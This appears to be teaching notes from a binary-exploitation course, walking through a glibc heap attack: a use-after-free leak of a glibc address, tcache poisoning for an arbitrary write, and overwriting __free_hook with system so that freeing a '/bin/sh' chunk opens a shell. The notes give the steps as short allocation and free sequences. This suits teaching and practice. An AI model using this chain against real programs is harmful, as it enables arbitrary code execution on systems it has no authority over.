Daily Reminder: Mom's Spaghetti

Our compass through all of this is the desire for the following comfort food:

• CONQUER ADDRESS RANDOMIZATION by a USE-AFTER-FREE vulnerability to leak a glibc address
• WRITE-WHAT-WHERE using TCACHE-POISONING for arbitrary writing to glibc
• CONTROL INSTRUCTION POINTER by overwriting the **FREE_HOOK** in glibc with system where "/bin/sh" is written in the free'd chunk

You're babies today and we're going to learn the warmth and love of the dining room table. So that as you venture into the wilderness you'll do your best to recreate this ritual in ever harsher environments.

Today's Goal: Pull off Mom's spaghetti

(Also find the FREE_HOOK)

• FIRST: generate a glibc leak
• SECOND: convert that glibc leak into the location of the FREE_HOOK
• THIRD: corrupt the linked-list to get a write-what-where targeting FREE_HOOK
• FOURTH: "free" a chunk which has the string "/bin/sh"

LAST TIME: The Samba for glibc leak

We pick a size just beyond tcache (0x420)

• A = MALLOC(0x420)
• B = MALLOC(24)
• FREE(A)
• VIEW(A)

Handling the leak

Now that we have a glibc address let's find what it is and find FREE_HOOK.

• Get the leak during a live debug gdb session
• run vmmap and find the start of glibc
• Find offset = leak - glibc_start
• Exit and in pwntools libc.sym["__free_hook"] is our offset (libc.sym["system"] will also be useful)

TCACHE-Poisoning

OK we know what payload (system) we want to send to the target (__free_hook).

Now the SAMBA for our tcache WWW:

• A = MALLOC(24)
• B = MALLOC(24)
• C = MALLOC(24)
• EDIT(C, b"/bin/sh")
• FREE(A)
• FREE(B)
• EDIT(B, p64(target))
• D = MALLOC(24)#pops B from bin
• E = MALLOC(24)#THIS IS __FREE_HOOK
• EDIT(E, p64(system))
• FREE(C)

(Link to) Heap Reference Materials

The Bins as Diagrams

Heap Flow Charts:

HEAP PLAYGROUND and STARTER SCRIPT: